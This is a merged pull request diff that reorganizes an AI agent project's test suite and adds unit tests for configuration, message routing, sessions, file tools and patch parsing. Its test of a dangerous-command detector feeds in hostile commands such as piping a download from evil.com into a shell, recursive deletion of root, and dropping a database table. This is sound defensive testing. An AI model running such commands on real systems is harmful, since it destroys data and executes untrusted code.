Merge pull request #34 from 0xbyt4/test/reorganize-and-add-unit-tests
test: reorganize test structure and add missing unit tests
This commit is contained in:
@@ -66,3 +66,10 @@ py-modules = ["run_agent", "model_tools", "toolsets", "batch_runner", "trajector
|
||||
|
||||
[tool.setuptools.packages.find]
|
||||
include = ["tools", "hermes_cli", "gateway", "cron"]
|
||||
|
||||
[tool.pytest.ini_options]
|
||||
testpaths = ["tests"]
|
||||
markers = [
|
||||
"integration: marks tests requiring external services (API keys, Modal, etc.)",
|
||||
]
|
||||
addopts = "-m 'not integration'"
|
||||
|
||||
38
tests/conftest.py
Normal file
38
tests/conftest.py
Normal file
@@ -0,0 +1,38 @@
|
||||
"""Shared fixtures for the hermes-agent test suite."""
|
||||
|
||||
import os
|
||||
import sys
|
||||
import tempfile
|
||||
from pathlib import Path
|
||||
from unittest.mock import patch
|
||||
|
||||
import pytest
|
||||
|
||||
# Ensure project root is importable
|
||||
PROJECT_ROOT = Path(__file__).parent.parent
|
||||
if str(PROJECT_ROOT) not in sys.path:
|
||||
sys.path.insert(0, str(PROJECT_ROOT))
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def tmp_dir(tmp_path):
|
||||
"""Provide a temporary directory that is cleaned up automatically."""
|
||||
return tmp_path
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def mock_config():
|
||||
"""Return a minimal hermes config dict suitable for unit tests."""
|
||||
return {
|
||||
"model": "test/mock-model",
|
||||
"toolsets": ["terminal", "file"],
|
||||
"max_turns": 10,
|
||||
"terminal": {
|
||||
"backend": "local",
|
||||
"cwd": "/tmp",
|
||||
"timeout": 30,
|
||||
},
|
||||
"compression": {"enabled": False},
|
||||
"memory": {"memory_enabled": False, "user_profile_enabled": False},
|
||||
"command_allowlist": [],
|
||||
}
|
||||
0
tests/gateway/__init__.py
Normal file
0
tests/gateway/__init__.py
Normal file
103
tests/gateway/test_config.py
Normal file
103
tests/gateway/test_config.py
Normal file
@@ -0,0 +1,103 @@
|
||||
"""Tests for gateway configuration management."""
|
||||
|
||||
from gateway.config import (
|
||||
GatewayConfig,
|
||||
HomeChannel,
|
||||
Platform,
|
||||
PlatformConfig,
|
||||
SessionResetPolicy,
|
||||
)
|
||||
|
||||
|
||||
class TestHomeChannelRoundtrip:
|
||||
def test_to_dict_from_dict(self):
|
||||
hc = HomeChannel(platform=Platform.DISCORD, chat_id="999", name="general")
|
||||
d = hc.to_dict()
|
||||
restored = HomeChannel.from_dict(d)
|
||||
|
||||
assert restored.platform == Platform.DISCORD
|
||||
assert restored.chat_id == "999"
|
||||
assert restored.name == "general"
|
||||
|
||||
|
||||
class TestPlatformConfigRoundtrip:
|
||||
def test_to_dict_from_dict(self):
|
||||
pc = PlatformConfig(
|
||||
enabled=True,
|
||||
token="tok_123",
|
||||
home_channel=HomeChannel(
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_id="555",
|
||||
name="Home",
|
||||
),
|
||||
extra={"foo": "bar"},
|
||||
)
|
||||
d = pc.to_dict()
|
||||
restored = PlatformConfig.from_dict(d)
|
||||
|
||||
assert restored.enabled is True
|
||||
assert restored.token == "tok_123"
|
||||
assert restored.home_channel.chat_id == "555"
|
||||
assert restored.extra == {"foo": "bar"}
|
||||
|
||||
def test_disabled_no_token(self):
|
||||
pc = PlatformConfig()
|
||||
d = pc.to_dict()
|
||||
restored = PlatformConfig.from_dict(d)
|
||||
assert restored.enabled is False
|
||||
assert restored.token is None
|
||||
|
||||
|
||||
class TestGetConnectedPlatforms:
|
||||
def test_returns_enabled_with_token(self):
|
||||
config = GatewayConfig(
|
||||
platforms={
|
||||
Platform.TELEGRAM: PlatformConfig(enabled=True, token="t"),
|
||||
Platform.DISCORD: PlatformConfig(enabled=False, token="d"),
|
||||
Platform.SLACK: PlatformConfig(enabled=True), # no token
|
||||
},
|
||||
)
|
||||
connected = config.get_connected_platforms()
|
||||
assert Platform.TELEGRAM in connected
|
||||
assert Platform.DISCORD not in connected
|
||||
assert Platform.SLACK not in connected
|
||||
|
||||
def test_empty_platforms(self):
|
||||
config = GatewayConfig()
|
||||
assert config.get_connected_platforms() == []
|
||||
|
||||
|
||||
class TestSessionResetPolicy:
|
||||
def test_roundtrip(self):
|
||||
policy = SessionResetPolicy(mode="idle", at_hour=6, idle_minutes=120)
|
||||
d = policy.to_dict()
|
||||
restored = SessionResetPolicy.from_dict(d)
|
||||
assert restored.mode == "idle"
|
||||
assert restored.at_hour == 6
|
||||
assert restored.idle_minutes == 120
|
||||
|
||||
def test_defaults(self):
|
||||
policy = SessionResetPolicy()
|
||||
assert policy.mode == "both"
|
||||
assert policy.at_hour == 4
|
||||
assert policy.idle_minutes == 1440
|
||||
|
||||
|
||||
class TestGatewayConfigRoundtrip:
|
||||
def test_full_roundtrip(self):
|
||||
config = GatewayConfig(
|
||||
platforms={
|
||||
Platform.TELEGRAM: PlatformConfig(
|
||||
enabled=True,
|
||||
token="tok",
|
||||
home_channel=HomeChannel(Platform.TELEGRAM, "123", "Home"),
|
||||
),
|
||||
},
|
||||
reset_triggers=["/new"],
|
||||
)
|
||||
d = config.to_dict()
|
||||
restored = GatewayConfig.from_dict(d)
|
||||
|
||||
assert Platform.TELEGRAM in restored.platforms
|
||||
assert restored.platforms[Platform.TELEGRAM].token == "tok"
|
||||
assert restored.reset_triggers == ["/new"]
|
||||
86
tests/gateway/test_delivery.py
Normal file
86
tests/gateway/test_delivery.py
Normal file
@@ -0,0 +1,86 @@
|
||||
"""Tests for the delivery routing module."""
|
||||
|
||||
from gateway.config import Platform, GatewayConfig, PlatformConfig, HomeChannel
|
||||
from gateway.delivery import DeliveryTarget, parse_deliver_spec
|
||||
from gateway.session import SessionSource
|
||||
|
||||
|
||||
class TestParseTargetPlatformChat:
|
||||
def test_explicit_telegram_chat(self):
|
||||
target = DeliveryTarget.parse("telegram:12345")
|
||||
assert target.platform == Platform.TELEGRAM
|
||||
assert target.chat_id == "12345"
|
||||
assert target.is_explicit is True
|
||||
|
||||
def test_platform_only_no_chat_id(self):
|
||||
target = DeliveryTarget.parse("discord")
|
||||
assert target.platform == Platform.DISCORD
|
||||
assert target.chat_id is None
|
||||
assert target.is_explicit is False
|
||||
|
||||
def test_local_target(self):
|
||||
target = DeliveryTarget.parse("local")
|
||||
assert target.platform == Platform.LOCAL
|
||||
assert target.chat_id is None
|
||||
|
||||
def test_origin_with_source(self):
|
||||
origin = SessionSource(platform=Platform.TELEGRAM, chat_id="789")
|
||||
target = DeliveryTarget.parse("origin", origin=origin)
|
||||
assert target.platform == Platform.TELEGRAM
|
||||
assert target.chat_id == "789"
|
||||
assert target.is_origin is True
|
||||
|
||||
def test_origin_without_source(self):
|
||||
target = DeliveryTarget.parse("origin")
|
||||
assert target.platform == Platform.LOCAL
|
||||
assert target.is_origin is True
|
||||
|
||||
def test_unknown_platform(self):
|
||||
target = DeliveryTarget.parse("unknown_platform")
|
||||
assert target.platform == Platform.LOCAL
|
||||
|
||||
|
||||
class TestParseDeliverSpec:
|
||||
def test_none_returns_default(self):
|
||||
result = parse_deliver_spec(None)
|
||||
assert result == "origin"
|
||||
|
||||
def test_empty_string_returns_default(self):
|
||||
result = parse_deliver_spec("")
|
||||
assert result == "origin"
|
||||
|
||||
def test_custom_default(self):
|
||||
result = parse_deliver_spec(None, default="local")
|
||||
assert result == "local"
|
||||
|
||||
def test_passthrough_string(self):
|
||||
result = parse_deliver_spec("telegram")
|
||||
assert result == "telegram"
|
||||
|
||||
def test_passthrough_list(self):
|
||||
result = parse_deliver_spec(["local", "telegram"])
|
||||
assert result == ["local", "telegram"]
|
||||
|
||||
|
||||
class TestTargetToStringRoundtrip:
|
||||
def test_origin_roundtrip(self):
|
||||
origin = SessionSource(platform=Platform.TELEGRAM, chat_id="111")
|
||||
target = DeliveryTarget.parse("origin", origin=origin)
|
||||
assert target.to_string() == "origin"
|
||||
|
||||
def test_local_roundtrip(self):
|
||||
target = DeliveryTarget.parse("local")
|
||||
assert target.to_string() == "local"
|
||||
|
||||
def test_platform_only_roundtrip(self):
|
||||
target = DeliveryTarget.parse("discord")
|
||||
assert target.to_string() == "discord"
|
||||
|
||||
def test_explicit_chat_roundtrip(self):
|
||||
target = DeliveryTarget.parse("telegram:999")
|
||||
s = target.to_string()
|
||||
assert s == "telegram:999"
|
||||
|
||||
reparsed = DeliveryTarget.parse(s)
|
||||
assert reparsed.platform == Platform.TELEGRAM
|
||||
assert reparsed.chat_id == "999"
|
||||
88
tests/gateway/test_session.py
Normal file
88
tests/gateway/test_session.py
Normal file
@@ -0,0 +1,88 @@
|
||||
"""Tests for gateway session management."""
|
||||
|
||||
from gateway.config import Platform, HomeChannel, GatewayConfig, PlatformConfig
|
||||
from gateway.session import (
|
||||
SessionSource,
|
||||
build_session_context,
|
||||
build_session_context_prompt,
|
||||
)
|
||||
|
||||
|
||||
class TestSessionSourceRoundtrip:
|
||||
def test_to_dict_from_dict(self):
|
||||
source = SessionSource(
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_id="12345",
|
||||
chat_name="My Group",
|
||||
chat_type="group",
|
||||
user_id="99",
|
||||
user_name="alice",
|
||||
thread_id="t1",
|
||||
)
|
||||
d = source.to_dict()
|
||||
restored = SessionSource.from_dict(d)
|
||||
|
||||
assert restored.platform == Platform.TELEGRAM
|
||||
assert restored.chat_id == "12345"
|
||||
assert restored.chat_name == "My Group"
|
||||
assert restored.chat_type == "group"
|
||||
assert restored.user_id == "99"
|
||||
assert restored.user_name == "alice"
|
||||
assert restored.thread_id == "t1"
|
||||
|
||||
def test_minimal_roundtrip(self):
|
||||
source = SessionSource(platform=Platform.LOCAL, chat_id="cli")
|
||||
d = source.to_dict()
|
||||
restored = SessionSource.from_dict(d)
|
||||
assert restored.platform == Platform.LOCAL
|
||||
assert restored.chat_id == "cli"
|
||||
|
||||
|
||||
class TestLocalCliSource:
|
||||
def test_local_cli(self):
|
||||
source = SessionSource.local_cli()
|
||||
assert source.platform == Platform.LOCAL
|
||||
assert source.chat_id == "cli"
|
||||
assert source.chat_type == "dm"
|
||||
|
||||
def test_description_local(self):
|
||||
source = SessionSource.local_cli()
|
||||
assert source.description == "CLI terminal"
|
||||
|
||||
|
||||
class TestBuildSessionContextPrompt:
|
||||
def test_contains_platform_info(self):
|
||||
config = GatewayConfig(
|
||||
platforms={
|
||||
Platform.TELEGRAM: PlatformConfig(
|
||||
enabled=True,
|
||||
token="fake-token",
|
||||
home_channel=HomeChannel(
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_id="111",
|
||||
name="Home Chat",
|
||||
),
|
||||
),
|
||||
},
|
||||
)
|
||||
source = SessionSource(
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_id="111",
|
||||
chat_name="Home Chat",
|
||||
chat_type="dm",
|
||||
)
|
||||
ctx = build_session_context(source, config)
|
||||
prompt = build_session_context_prompt(ctx)
|
||||
|
||||
assert "Telegram" in prompt
|
||||
assert "Home Chat" in prompt
|
||||
assert "Session Context" in prompt
|
||||
|
||||
def test_local_source_prompt(self):
|
||||
config = GatewayConfig()
|
||||
source = SessionSource.local_cli()
|
||||
ctx = build_session_context(source, config)
|
||||
prompt = build_session_context_prompt(ctx)
|
||||
|
||||
assert "Local" in prompt
|
||||
assert "machine running this agent" in prompt
|
||||
0
tests/hermes_cli/__init__.py
Normal file
0
tests/hermes_cli/__init__.py
Normal file
68
tests/hermes_cli/test_config.py
Normal file
68
tests/hermes_cli/test_config.py
Normal file
@@ -0,0 +1,68 @@
|
||||
"""Tests for hermes_cli configuration management."""
|
||||
|
||||
import os
|
||||
from pathlib import Path
|
||||
from unittest.mock import patch
|
||||
|
||||
from hermes_cli.config import (
|
||||
DEFAULT_CONFIG,
|
||||
get_hermes_home,
|
||||
ensure_hermes_home,
|
||||
load_config,
|
||||
save_config,
|
||||
)
|
||||
|
||||
|
||||
class TestGetHermesHome:
|
||||
def test_default_path(self):
|
||||
with patch.dict(os.environ, {}, clear=False):
|
||||
os.environ.pop("HERMES_HOME", None)
|
||||
home = get_hermes_home()
|
||||
assert home == Path.home() / ".hermes"
|
||||
|
||||
def test_env_override(self):
|
||||
with patch.dict(os.environ, {"HERMES_HOME": "/custom/path"}):
|
||||
home = get_hermes_home()
|
||||
assert home == Path("/custom/path")
|
||||
|
||||
|
||||
class TestEnsureHermesHome:
|
||||
def test_creates_subdirs(self, tmp_path):
|
||||
with patch.dict(os.environ, {"HERMES_HOME": str(tmp_path)}):
|
||||
ensure_hermes_home()
|
||||
assert (tmp_path / "cron").is_dir()
|
||||
assert (tmp_path / "sessions").is_dir()
|
||||
assert (tmp_path / "logs").is_dir()
|
||||
assert (tmp_path / "memories").is_dir()
|
||||
|
||||
|
||||
class TestLoadConfigDefaults:
|
||||
def test_returns_defaults_when_no_file(self, tmp_path):
|
||||
with patch.dict(os.environ, {"HERMES_HOME": str(tmp_path)}):
|
||||
config = load_config()
|
||||
assert config["model"] == DEFAULT_CONFIG["model"]
|
||||
assert config["max_turns"] == DEFAULT_CONFIG["max_turns"]
|
||||
assert "terminal" in config
|
||||
assert config["terminal"]["backend"] == "local"
|
||||
|
||||
|
||||
class TestSaveAndLoadRoundtrip:
|
||||
def test_roundtrip(self, tmp_path):
|
||||
with patch.dict(os.environ, {"HERMES_HOME": str(tmp_path)}):
|
||||
config = load_config()
|
||||
config["model"] = "test/custom-model"
|
||||
config["max_turns"] = 42
|
||||
save_config(config)
|
||||
|
||||
reloaded = load_config()
|
||||
assert reloaded["model"] == "test/custom-model"
|
||||
assert reloaded["max_turns"] == 42
|
||||
|
||||
def test_nested_values_preserved(self, tmp_path):
|
||||
with patch.dict(os.environ, {"HERMES_HOME": str(tmp_path)}):
|
||||
config = load_config()
|
||||
config["terminal"]["timeout"] = 999
|
||||
save_config(config)
|
||||
|
||||
reloaded = load_config()
|
||||
assert reloaded["terminal"]["timeout"] == 999
|
||||
33
tests/hermes_cli/test_models.py
Normal file
33
tests/hermes_cli/test_models.py
Normal file
@@ -0,0 +1,33 @@
|
||||
"""Tests for the hermes_cli models module."""
|
||||
|
||||
from hermes_cli.models import OPENROUTER_MODELS, menu_labels, model_ids
|
||||
|
||||
|
||||
class TestModelIds:
|
||||
def test_returns_strings(self):
|
||||
ids = model_ids()
|
||||
assert isinstance(ids, list)
|
||||
assert len(ids) > 0
|
||||
assert all(isinstance(mid, str) for mid in ids)
|
||||
|
||||
def test_ids_match_models_list(self):
|
||||
ids = model_ids()
|
||||
expected = [mid for mid, _ in OPENROUTER_MODELS]
|
||||
assert ids == expected
|
||||
|
||||
|
||||
class TestMenuLabels:
|
||||
def test_same_length_as_model_ids(self):
|
||||
labels = menu_labels()
|
||||
ids = model_ids()
|
||||
assert len(labels) == len(ids)
|
||||
|
||||
def test_recommended_in_first(self):
|
||||
labels = menu_labels()
|
||||
assert "recommended" in labels[0].lower()
|
||||
|
||||
def test_labels_contain_model_ids(self):
|
||||
labels = menu_labels()
|
||||
ids = model_ids()
|
||||
for label, mid in zip(labels, ids):
|
||||
assert mid in label
|
||||
0
tests/integration/__init__.py
Normal file
0
tests/integration/__init__.py
Normal file
@@ -6,6 +6,9 @@ This script tests the batch runner with a small sample dataset
|
||||
to verify functionality before running large batches.
|
||||
"""
|
||||
|
||||
import pytest
|
||||
pytestmark = pytest.mark.integration
|
||||
|
||||
import json
|
||||
import shutil
|
||||
from pathlib import Path
|
||||
@@ -10,14 +10,17 @@ This script simulates batch processing with intentional failures to test:
|
||||
Usage:
|
||||
# Test current implementation
|
||||
python tests/test_checkpoint_resumption.py --test_current
|
||||
|
||||
|
||||
# Test after fix is applied
|
||||
python tests/test_checkpoint_resumption.py --test_fixed
|
||||
|
||||
|
||||
# Run full comparison
|
||||
python tests/test_checkpoint_resumption.py --compare
|
||||
"""
|
||||
|
||||
import pytest
|
||||
pytestmark = pytest.mark.integration
|
||||
|
||||
import json
|
||||
import os
|
||||
import shutil
|
||||
@@ -27,8 +30,8 @@ from pathlib import Path
|
||||
from typing import List, Dict, Any
|
||||
import traceback
|
||||
|
||||
# Add parent directory to path to import batch_runner
|
||||
sys.path.insert(0, str(Path(__file__).parent.parent))
|
||||
# Add project root to path to import batch_runner
|
||||
sys.path.insert(0, str(Path(__file__).parent.parent.parent))
|
||||
|
||||
|
||||
def create_test_dataset(num_prompts: int = 20) -> Path:
|
||||
@@ -8,11 +8,14 @@ and can execute commands in Modal sandboxes.
|
||||
Usage:
|
||||
# Run with Modal backend
|
||||
TERMINAL_ENV=modal python tests/test_modal_terminal.py
|
||||
|
||||
|
||||
# Or run directly (will use whatever TERMINAL_ENV is set in .env)
|
||||
python tests/test_modal_terminal.py
|
||||
"""
|
||||
|
||||
import pytest
|
||||
pytestmark = pytest.mark.integration
|
||||
|
||||
import os
|
||||
import sys
|
||||
import json
|
||||
@@ -24,7 +27,7 @@ try:
|
||||
load_dotenv()
|
||||
except ImportError:
|
||||
# Manually load .env if dotenv not available
|
||||
env_file = Path(__file__).parent.parent / ".env"
|
||||
env_file = Path(__file__).parent.parent.parent / ".env"
|
||||
if env_file.exists():
|
||||
with open(env_file) as f:
|
||||
for line in f:
|
||||
@@ -35,8 +38,8 @@ except ImportError:
|
||||
value = value.strip().strip('"').strip("'")
|
||||
os.environ.setdefault(key.strip(), value)
|
||||
|
||||
# Add parent directory to path for imports
|
||||
parent_dir = Path(__file__).parent.parent
|
||||
# Add project root to path for imports
|
||||
parent_dir = Path(__file__).parent.parent.parent
|
||||
sys.path.insert(0, str(parent_dir))
|
||||
sys.path.insert(0, str(parent_dir / "mini-swe-agent" / "src"))
|
||||
|
||||
@@ -12,9 +12,12 @@ Usage:
|
||||
|
||||
Requirements:
|
||||
- FIRECRAWL_API_KEY environment variable must be set
|
||||
- NOUS_API_KEY environment vitinariable (optional, for LLM tests)
|
||||
- NOUS_API_KEY environment variable (optional, for LLM tests)
|
||||
"""
|
||||
|
||||
import pytest
|
||||
pytestmark = pytest.mark.integration
|
||||
|
||||
import json
|
||||
import asyncio
|
||||
import sys
|
||||
0
tests/tools/__init__.py
Normal file
0
tests/tools/__init__.py
Normal file
95
tests/tools/test_approval.py
Normal file
95
tests/tools/test_approval.py
Normal file
@@ -0,0 +1,95 @@
|
||||
"""Tests for the dangerous command approval module."""
|
||||
|
||||
from tools.approval import (
|
||||
approve_session,
|
||||
clear_session,
|
||||
detect_dangerous_command,
|
||||
has_pending,
|
||||
is_approved,
|
||||
pop_pending,
|
||||
submit_pending,
|
||||
)
|
||||
|
||||
|
||||
class TestDetectDangerousRm:
|
||||
def test_rm_rf_detected(self):
|
||||
is_dangerous, key, desc = detect_dangerous_command("rm -rf /home/user")
|
||||
assert is_dangerous is True
|
||||
assert desc is not None
|
||||
|
||||
def test_rm_recursive_long_flag(self):
|
||||
is_dangerous, key, desc = detect_dangerous_command("rm --recursive /tmp/stuff")
|
||||
assert is_dangerous is True
|
||||
|
||||
|
||||
class TestDetectDangerousSudo:
|
||||
def test_shell_via_c_flag(self):
|
||||
is_dangerous, key, desc = detect_dangerous_command("bash -c 'echo pwned'")
|
||||
assert is_dangerous is True
|
||||
|
||||
def test_curl_pipe_sh(self):
|
||||
is_dangerous, key, desc = detect_dangerous_command("curl http://evil.com | sh")
|
||||
assert is_dangerous is True
|
||||
|
||||
|
||||
class TestDetectSqlPatterns:
|
||||
def test_drop_table(self):
|
||||
is_dangerous, _, desc = detect_dangerous_command("DROP TABLE users")
|
||||
assert is_dangerous is True
|
||||
|
||||
def test_delete_without_where(self):
|
||||
is_dangerous, _, desc = detect_dangerous_command("DELETE FROM users")
|
||||
assert is_dangerous is True
|
||||
|
||||
def test_delete_with_where_safe(self):
|
||||
is_dangerous, _, _ = detect_dangerous_command("DELETE FROM users WHERE id = 1")
|
||||
assert is_dangerous is False
|
||||
|
||||
|
||||
class TestSafeCommand:
|
||||
def test_echo_is_safe(self):
|
||||
is_dangerous, key, desc = detect_dangerous_command("echo hello world")
|
||||
assert is_dangerous is False
|
||||
assert key is None
|
||||
|
||||
def test_ls_is_safe(self):
|
||||
is_dangerous, _, _ = detect_dangerous_command("ls -la /tmp")
|
||||
assert is_dangerous is False
|
||||
|
||||
def test_git_is_safe(self):
|
||||
is_dangerous, _, _ = detect_dangerous_command("git status")
|
||||
assert is_dangerous is False
|
||||
|
||||
|
||||
class TestSubmitAndPopPending:
|
||||
def test_submit_and_pop(self):
|
||||
key = "test_session_pending"
|
||||
clear_session(key)
|
||||
|
||||
submit_pending(key, {"command": "rm -rf /", "pattern_key": "rm"})
|
||||
assert has_pending(key) is True
|
||||
|
||||
approval = pop_pending(key)
|
||||
assert approval["command"] == "rm -rf /"
|
||||
assert has_pending(key) is False
|
||||
|
||||
def test_pop_empty_returns_none(self):
|
||||
key = "test_session_empty"
|
||||
clear_session(key)
|
||||
assert pop_pending(key) is None
|
||||
|
||||
|
||||
class TestApproveAndCheckSession:
|
||||
def test_session_approval(self):
|
||||
key = "test_session_approve"
|
||||
clear_session(key)
|
||||
|
||||
assert is_approved(key, "rm") is False
|
||||
approve_session(key, "rm")
|
||||
assert is_approved(key, "rm") is True
|
||||
|
||||
def test_clear_session_removes_approvals(self):
|
||||
key = "test_session_clear"
|
||||
approve_session(key, "rm")
|
||||
clear_session(key)
|
||||
assert is_approved(key, "rm") is False
|
||||
@@ -12,15 +12,11 @@ Run with: python -m pytest tests/test_code_execution.py -v
|
||||
"""
|
||||
|
||||
import json
|
||||
import os
|
||||
import sys
|
||||
import time
|
||||
import unittest
|
||||
from unittest.mock import patch
|
||||
|
||||
# Ensure the project root is on the path
|
||||
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
|
||||
|
||||
from tools.code_execution_tool import (
|
||||
SANDBOX_ALLOWED_TOOLS,
|
||||
execute_code,
|
||||
@@ -10,13 +10,10 @@ Run with: python -m pytest tests/test_delegate.py -v
|
||||
"""
|
||||
|
||||
import json
|
||||
import os
|
||||
import sys
|
||||
import unittest
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
|
||||
|
||||
from tools.delegate_tool import (
|
||||
DELEGATE_BLOCKED_TOOLS,
|
||||
DELEGATE_TASK_SCHEMA,
|
||||
99
tests/tools/test_file_tools.py
Normal file
99
tests/tools/test_file_tools.py
Normal file
@@ -0,0 +1,99 @@
|
||||
"""Tests for the file tools module (schema and handler wiring).
|
||||
|
||||
These tests verify the tool schemas and handler wiring without
|
||||
requiring a running terminal environment. The actual file operations
|
||||
(ShellFileOperations) depend on a terminal backend, so we mock
|
||||
_get_file_ops to test the handler logic in isolation.
|
||||
"""
|
||||
|
||||
import json
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
from tools.file_tools import (
|
||||
FILE_TOOLS,
|
||||
READ_FILE_SCHEMA,
|
||||
WRITE_FILE_SCHEMA,
|
||||
PATCH_SCHEMA,
|
||||
SEARCH_FILES_SCHEMA,
|
||||
)
|
||||
|
||||
|
||||
class TestSchemas:
|
||||
def test_read_file_schema(self):
|
||||
assert READ_FILE_SCHEMA["name"] == "read_file"
|
||||
props = READ_FILE_SCHEMA["parameters"]["properties"]
|
||||
assert "path" in props
|
||||
assert "offset" in props
|
||||
assert "limit" in props
|
||||
|
||||
def test_write_file_schema(self):
|
||||
assert WRITE_FILE_SCHEMA["name"] == "write_file"
|
||||
assert "path" in WRITE_FILE_SCHEMA["parameters"]["properties"]
|
||||
assert "content" in WRITE_FILE_SCHEMA["parameters"]["properties"]
|
||||
|
||||
def test_patch_schema(self):
|
||||
assert PATCH_SCHEMA["name"] == "patch"
|
||||
props = PATCH_SCHEMA["parameters"]["properties"]
|
||||
assert "mode" in props
|
||||
assert "old_string" in props
|
||||
assert "new_string" in props
|
||||
|
||||
def test_search_files_schema(self):
|
||||
assert SEARCH_FILES_SCHEMA["name"] == "search_files"
|
||||
props = SEARCH_FILES_SCHEMA["parameters"]["properties"]
|
||||
assert "pattern" in props
|
||||
assert "target" in props
|
||||
|
||||
|
||||
class TestFileToolsList:
|
||||
def test_file_tools_has_expected_entries(self):
|
||||
names = {t["name"] for t in FILE_TOOLS}
|
||||
assert names == {"read_file", "write_file", "patch", "search_files"}
|
||||
|
||||
|
||||
class TestReadFileHandler:
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
def test_read_file_returns_json(self, mock_get):
|
||||
mock_ops = MagicMock()
|
||||
result_obj = MagicMock()
|
||||
result_obj.to_dict.return_value = {"content": "hello", "total_lines": 1}
|
||||
mock_ops.read_file.return_value = result_obj
|
||||
mock_get.return_value = mock_ops
|
||||
|
||||
from tools.file_tools import read_file_tool
|
||||
|
||||
result = json.loads(read_file_tool("/tmp/test.txt"))
|
||||
assert result["content"] == "hello"
|
||||
mock_ops.read_file.assert_called_once_with("/tmp/test.txt", 1, 500)
|
||||
|
||||
|
||||
class TestWriteFileHandler:
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
def test_write_file_returns_json(self, mock_get):
|
||||
mock_ops = MagicMock()
|
||||
result_obj = MagicMock()
|
||||
result_obj.to_dict.return_value = {"status": "ok", "path": "/tmp/test.txt"}
|
||||
mock_ops.write_file.return_value = result_obj
|
||||
mock_get.return_value = mock_ops
|
||||
|
||||
from tools.file_tools import write_file_tool
|
||||
|
||||
result = json.loads(write_file_tool("/tmp/test.txt", "content"))
|
||||
assert result["status"] == "ok"
|
||||
mock_ops.write_file.assert_called_once_with("/tmp/test.txt", "content")
|
||||
|
||||
|
||||
class TestPatchHandler:
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
def test_replace_mode_missing_path_errors(self, mock_get):
|
||||
from tools.file_tools import patch_tool
|
||||
|
||||
result = json.loads(patch_tool(mode="replace", path=None, old_string="a", new_string="b"))
|
||||
assert "error" in result
|
||||
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
def test_unknown_mode_errors(self, mock_get):
|
||||
from tools.file_tools import patch_tool
|
||||
|
||||
result = json.loads(patch_tool(mode="unknown"))
|
||||
assert "error" in result
|
||||
67
tests/tools/test_fuzzy_match.py
Normal file
67
tests/tools/test_fuzzy_match.py
Normal file
@@ -0,0 +1,67 @@
|
||||
"""Tests for the fuzzy matching module."""
|
||||
|
||||
from tools.fuzzy_match import fuzzy_find_and_replace
|
||||
|
||||
|
||||
class TestExactMatch:
|
||||
def test_single_replacement(self):
|
||||
content = "hello world"
|
||||
new, count, err = fuzzy_find_and_replace(content, "hello", "hi")
|
||||
assert err is None
|
||||
assert count == 1
|
||||
assert new == "hi world"
|
||||
|
||||
def test_no_match(self):
|
||||
content = "hello world"
|
||||
new, count, err = fuzzy_find_and_replace(content, "xyz", "abc")
|
||||
assert count == 0
|
||||
assert err is not None
|
||||
assert new == content
|
||||
|
||||
def test_empty_old_string(self):
|
||||
new, count, err = fuzzy_find_and_replace("abc", "", "x")
|
||||
assert count == 0
|
||||
assert err is not None
|
||||
|
||||
def test_identical_strings(self):
|
||||
new, count, err = fuzzy_find_and_replace("abc", "abc", "abc")
|
||||
assert count == 0
|
||||
assert "identical" in err
|
||||
|
||||
def test_multiline_exact(self):
|
||||
content = "line1\nline2\nline3"
|
||||
new, count, err = fuzzy_find_and_replace(content, "line1\nline2", "replaced")
|
||||
assert err is None
|
||||
assert count == 1
|
||||
assert new == "replaced\nline3"
|
||||
|
||||
|
||||
class TestWhitespaceDifference:
|
||||
def test_extra_spaces_match(self):
|
||||
content = "def foo( x, y ):"
|
||||
new, count, err = fuzzy_find_and_replace(content, "def foo( x, y ):", "def bar(x, y):")
|
||||
assert count == 1
|
||||
assert "bar" in new
|
||||
|
||||
|
||||
class TestIndentDifference:
|
||||
def test_different_indentation(self):
|
||||
content = " def foo():\n pass"
|
||||
new, count, err = fuzzy_find_and_replace(content, "def foo():\n pass", "def bar():\n return 1")
|
||||
assert count == 1
|
||||
assert "bar" in new
|
||||
|
||||
|
||||
class TestReplaceAll:
|
||||
def test_multiple_matches_without_flag_errors(self):
|
||||
content = "aaa bbb aaa"
|
||||
new, count, err = fuzzy_find_and_replace(content, "aaa", "ccc", replace_all=False)
|
||||
assert count == 0
|
||||
assert "Found 2 matches" in err
|
||||
|
||||
def test_multiple_matches_with_flag(self):
|
||||
content = "aaa bbb aaa"
|
||||
new, count, err = fuzzy_find_and_replace(content, "aaa", "ccc", replace_all=True)
|
||||
assert err is None
|
||||
assert count == 2
|
||||
assert new == "ccc bbb ccc"
|
||||
139
tests/tools/test_patch_parser.py
Normal file
139
tests/tools/test_patch_parser.py
Normal file
@@ -0,0 +1,139 @@
|
||||
"""Tests for the V4A patch format parser."""
|
||||
|
||||
from tools.patch_parser import (
|
||||
OperationType,
|
||||
parse_v4a_patch,
|
||||
)
|
||||
|
||||
|
||||
class TestParseUpdateFile:
|
||||
def test_basic_update(self):
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Update File: src/main.py
|
||||
@@ def greet @@
|
||||
def greet():
|
||||
- print("hello")
|
||||
+ print("hi")
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is None
|
||||
assert len(ops) == 1
|
||||
|
||||
op = ops[0]
|
||||
assert op.operation == OperationType.UPDATE
|
||||
assert op.file_path == "src/main.py"
|
||||
assert len(op.hunks) == 1
|
||||
|
||||
hunk = op.hunks[0]
|
||||
assert hunk.context_hint == "def greet"
|
||||
prefixes = [l.prefix for l in hunk.lines]
|
||||
assert " " in prefixes
|
||||
assert "-" in prefixes
|
||||
assert "+" in prefixes
|
||||
|
||||
def test_multiple_hunks(self):
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Update File: f.py
|
||||
@@ first @@
|
||||
a
|
||||
-b
|
||||
+c
|
||||
@@ second @@
|
||||
